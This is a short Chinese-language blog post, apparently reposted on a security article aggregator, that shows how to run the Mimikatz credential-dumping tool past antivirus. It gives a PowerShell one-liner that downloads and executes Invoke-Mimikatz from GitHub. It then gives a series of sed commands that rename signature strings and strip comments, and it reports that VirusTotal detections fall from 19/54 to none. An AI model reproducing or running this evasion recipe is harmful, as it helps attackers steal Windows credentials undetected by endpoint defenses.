Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

绕过杀毒软件运行Mimikatz

0
0

使用PowerSploit运行PowerShell脚本Invoke-Mimikatz被windows Defender标记为恶意

powershell "IEX (New-Object Net.WebClient).DownloadString ('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/ Invoke-Mimikatz.ps1');Invoke-Mimikatz"
绕过杀毒软件运行Mimikatz
绕过杀毒软件运行Mimikatz

VirusTotal查杀结果:19/54


绕过杀毒软件运行Mimikatz

使用linux命令将Invoke-Mimikatz更改为Invoke-Mimidogz,可以将检测率降至8/54。

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
绕过杀毒软件运行Mimikatz

删除不必要的注释

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
绕过杀毒软件运行Mimikatz

将Katz重命名为Dogz并删除注释后,检测率下降到了4/54

DumpCreds改为DumpCred


绕过杀毒软件运行Mimikatz

操作下来只有两个杀毒检测出这个文件是恶意的。

再添加三个匹配和替换的规则看看

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
绕过杀毒软件运行Mimikatz

匹配和替换规则后无AV检测


绕过杀毒软件运行Mimikatz

Viewing all articles
Browse latest Browse all 12749


click here for Latest and Popular articles on SAP ERP